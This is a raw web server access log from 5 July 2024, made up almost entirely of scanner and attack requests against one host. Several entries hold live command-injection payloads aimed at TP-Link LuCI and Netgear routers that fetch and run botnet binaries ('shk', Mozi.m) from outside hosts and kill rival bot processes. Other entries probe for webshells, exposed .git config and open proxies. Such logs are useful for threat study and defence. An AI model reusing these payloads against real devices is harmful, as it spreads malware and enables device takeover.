45.148.10.174 - - [05/Jul/2024:00:04:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [05/Jul/2024:00:04:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 117.220.146.94 - - [05/Jul/2024:00:22:54 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.220.146.94:38699/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 727 45.89.245.57 - - [05/Jul/2024:00:45:53 +0200] "GET / HTTP/1.1" 200 1895 174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:00:59:55 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp 
HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:01:10:23 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 87.121.69.27 - - [05/Jul/2024:02:09:08 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 91.238.181.22 - - [05/Jul/2024:02:25:32 +0200] "-" 400 1930 216.218.206.102 - - [05/Jul/2024:02:33:37 +0200] "GET / HTTP/1.1" 200 1895 216.218.206.66 - - [05/Jul/2024:02:34:12 +0200] "GET /favicon.ico HTTP/1.1" 404 729 216.218.206.118 - - [05/Jul/2024:02:34:40 +0200] "GET /?format=json HTTP/1.1" 200 1895 216.218.206.90 - - [05/Jul/2024:02:35:05 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 23.90.165.142 - - [05/Jul/2024:02:38:19 +0200] "GET / HTTP/1.1" 200 1895 194.59.31.99 - - [05/Jul/2024:02:55:19 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 45.148.10.174 - - [05/Jul/2024:03:33:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 
45.148.10.174 - - [05/Jul/2024:03:33:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [05/Jul/2024:03:49:20 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 58.176.52.254 - - [05/Jul/2024:03:49:40 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 206.168.32.105 - - [05/Jul/2024:05:16:01 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.105 - - [05/Jul/2024:05:16:04 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.105 - - [05/Jul/2024:05:16:05 +0200] "GET /favicon.ico HTTP/1.1" 404 729 205.210.31.239 - - [05/Jul/2024:05:47:39 +0200] "-" 400 1930 205.210.31.239 - - [05/Jul/2024:05:47:39 +0200] "-" 400 1930 87.121.69.27 - - [05/Jul/2024:05:47:46 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.102.56.99 - - [05/Jul/2024:05:56:38 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [05/Jul/2024:06:07:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [05/Jul/2024:06:07:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp 
HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:06:59:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 167.71.190.239 - - [05/Jul/2024:07:09:19 +0200] "-" 400 1930 167.71.190.239 - - [05/Jul/2024:07:09:19 +0200] "-" 400 1930 167.71.190.239 - - [05/Jul/2024:07:09:19 +0200] "GET / HTTP/1.1" 200 1895 167.71.190.239 - - [05/Jul/2024:07:09:19 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:07:10:21 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 52.249.38.246 - - [05/Jul/2024:07:15:08 +0200] "-" 400 1930 78.108.177.54 - - [05/Jul/2024:07:24:33 +0200] "GET / HTTP/1.0" 200 1895 87.121.69.27 - - [05/Jul/2024:07:53:28 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.66.92 - - 
[05/Jul/2024:08:06:17 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 167.94.146.54 - - [05/Jul/2024:08:55:47 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.54 - - [05/Jul/2024:08:55:50 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.54 - - [05/Jul/2024:08:55:50 +0200] "GET /favicon.ico HTTP/1.1" 404 729 106.75.134.172 - - [05/Jul/2024:09:06:12 +0200] "GET /.git/config HTTP/1.1" 404 733 45.148.10.174 - - [05/Jul/2024:09:07:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [05/Jul/2024:09:07:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 178.215.236.52 - - [05/Jul/2024:09:26:15 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 87.121.69.27 - - [05/Jul/2024:09:31:01 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 122.228.86.230 - - [05/Jul/2024:10:38:43 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [05/Jul/2024:11:00:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 65.49.1.15 - - [05/Jul/2024:11:11:32 +0200] "-" 400 1930 174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 
404 728 174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:21:14 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:28:45 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:28:47 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:28:48 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:28:48 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:28:48 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:28:49 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:28:49 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:28:49 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:28:50 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:30:45 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:11:30:45 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:11:30:46 +0200] "POST 
/dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:38:02 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:47:17 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:56:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:56:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:56:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:56:09 +0200] "POST 
/tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:56:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:56:09 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:56:10 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:56:10 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:56:10 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:11:56:10 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:12:02:28 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [05/Jul/2024:12:04:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:04:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:04:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:04:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:04:41 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:04:42 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:04:42 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - 
[05/Jul/2024:12:04:42 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:04:42 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:04:42 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:10:35 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:10:36 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:18:51 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:18:51 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:18:51 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:18:51 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:18:52 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:18:52 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:18:53 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:18:53 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:18:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:12:18:54 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 194.59.31.99 - - [05/Jul/2024:12:55:55 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 87.121.69.27 - - 
[05/Jul/2024:13:04:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 167.71.164.47 - - [05/Jul/2024:13:31:14 +0200] "-" 400 1930 167.71.164.47 - - [05/Jul/2024:13:31:15 +0200] "-" 400 1930 167.71.164.47 - - [05/Jul/2024:13:31:15 +0200] "GET / HTTP/1.1" 200 1895 167.71.164.47 - - [05/Jul/2024:13:31:15 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 94.156.66.81 - - [05/Jul/2024:13:50:16 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 94.156.66.90 - - [05/Jul/2024:13:51:26 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 13.64.211.24 - - [05/Jul/2024:14:17:09 +0200] "GET / HTTP/1.1" 200 1895 188.94.32.94 - - [05/Jul/2024:14:35:07 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.104 - - [05/Jul/2024:14:44:28 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.104 - - [05/Jul/2024:14:44:31 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.104 - - [05/Jul/2024:14:44:32 +0200] "GET /favicon.ico HTTP/1.1" 404 729 175.30.48.82 - - [05/Jul/2024:15:15:09 +0200] "GET / HTTP/1.1" 200 1895 221.207.35.36 - - [05/Jul/2024:15:16:31 +0200] "GET / HTTP/1.1" 200 1895 1.24.16.114 - - [05/Jul/2024:15:16:31 +0200] "GET /favicon.ico HTTP/1.1" 404 729 212.102.57.145 - - [05/Jul/2024:16:15:15 +0200] "CONNECT karlshochschule.de:443 HTTP/1.1" 400 804 94.156.67.70 - - [05/Jul/2024:16:46:18 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 45.148.10.174 - - [05/Jul/2024:16:59:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [05/Jul/2024:16:59:37 +0200] "GET 
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [05/Jul/2024:17:09:01 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 182.31.94.35 - - [05/Jul/2024:18:15:45 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 198.235.24.186 - - [05/Jul/2024:18:53:12 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [05/Jul/2024:19:18:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [05/Jul/2024:19:34:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [05/Jul/2024:19:34:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [05/Jul/2024:20:28:04 +0200] "POST 
